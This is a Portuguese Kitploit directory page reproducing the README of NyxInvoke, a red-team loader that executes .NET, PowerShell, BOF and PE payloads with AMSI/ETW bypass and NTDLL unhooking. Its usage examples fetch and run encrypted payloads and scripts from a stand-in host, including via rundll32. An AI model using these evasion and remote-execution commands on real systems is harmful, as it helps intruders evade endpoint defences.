Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
NyxInvoke — NyxInvoke é uma ferramenta de CLI em Rust para executar assemblies .NET, PowerShell e BOFs com recursos de bypass de AMSI e ETW sem patch. com suporte a Dual-build | Kitploit
Ferramentas/GitHubGitHub/blacksnufkin/nyxinvoke
ExploraçãoEvasão de IDS/IPSShellcodePós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke é uma ferramenta de CLI em Rust para executar assemblies .NET, PowerShell e BOFs com recursos de bypass de AMSI e ETW sem patch. com suporte a Dual-build

243301há 1 anoRevisado pelo Kitploit
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

NyxInvoke

O NyxInvoke é uma ferramenta versátil baseada em Rust projetada para executar assemblies .NET, comandos/scripts PowerShell, Beacon Object Files (BOFs) e arquivos PE, com recursos integrados de unhooking de NtDll, bypass de AMSI e ETW sem patch. Ele pode ser compilado como um executável autônomo ou uma DLL.

Recursos

  • Executar assemblies .NET
  • Executar comandos ou scripts do PowerShell
  • Carregar e executar Beacon Object Files (BOFs)
  • Carregar e executar arquivos PE (EXEs)
  • Bypass de AMSI (Anti-Malware Scan Interface) integrado sem patch
  • Bypass de ETW (Event Tracing for Windows) integrado sem patch
  • Unhook de NTDLL integrado sem acionar o callback "PspCreateProcessNotifyRoutine"
  • Suporte a payloads criptografados com descriptografia AES
  • Opções flexíveis de entrada: arquivos locais, URLs ou dados embutidos na compilação
  • Suporte a compilação dupla: pode ser compilado como executável ou DLL

Compilação

O NyxInvoke pode ser compilado como executável ou DLL. Use os seguintes comandos:

Executável

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

Para incluir dados CLR, BOF ou PE embutidos na compilação, adicione os respectivos recursos:

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

ou

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

Uso

Modo Executável

O executável suporta três modos principais de operação:

  1. Modo CLR (execução de assemblies .NET)
  2. Modo PowerShell
  3. Modo BOF (execução de Beacon Object Files)
  4. Modo PE (execução de arquivos PE)

Sintaxe Geral

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

Onde <mode> é um destes: clr, ps, bof ou pe.

Modo DLL

Quando compilado como DLL, o NyxInvoke pode ser executado usando rundll32. A sintaxe é:

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Opções Específicas de Modo

  1. Modo CLR:
root@kitploit:~
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo BOF:
root@kitploit:~
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo PE:
root@kitploit:~
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo PowerShell:
root@kitploit:~
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

Exemplos

Modo Executável

  1. Modo CLR (Execução Remota):

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Modo PowerShell (Execução de Script):

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. Modo BOF (Execução Local):

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. Modo PE (Execução Compilada):

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

Modo DLL

  1. Modo CLR (Execução Remota):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Modo PowerShell (Execução de Comando Direto):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. Modo BOF (Execução Compilada):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. Modo PE (Execução Local Sem Criptografia):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

Recursos de Teste

No diretório resources, você encontrará vários arquivos para testar a funcionalidade do NyxInvoke:

  1. Assembly CLR Criptografado (Seatbelt):

    • Arquivo: clr_data.enc
    • Descrição: Uma versão criptografada da ferramenta Seatbelt, um projeto C# para coleta de informações do sistema.
    • Exemplo de uso:
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. BOF Criptografado (Listagem de Diretório):

    • Arquivo: bof_data.enc
    • Descrição: Um Beacon Object File criptografado que lista as permissões do usuário para o arquivo especificado, com suporte a curingas.
    • Exemplo de uso:
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. PE Criptografado (Message Box):

    • Arquivo: pe_data.enc
    • Descrição: Um arquivo PE criptografado que exibe uma caixa de mensagem.
    • Exemplo de uso:
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. PowerShell (Message Box):

    • Arquivo: ps.ps1
    • Descrição: Um script PowerShell que exibe uma caixa de mensagem.
    • Exemplo de uso:
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

Captura de Tela

  • Execução de CLR via DLL compilada

Screenshot 2024-09-18 123147

  • Execução remota de BOF via EXE

Screenshot 2024-09-18 123410

  • Execução de EXE via DLL compilada

pe

  • Execução de script PowerShell via DLL

Screenshot 2024-09-18 123547

Aviso Legal

Esta ferramenta é apenas para fins educacionais e de testes autorizados. Certifique-se de ter as permissões adequadas antes de usá-la em qualquer ambiente.

Créditos

  • @yamakadi pelo projeto clroxide
  • @hakaioffsec pelo projeto coffee
Baixar ferramenta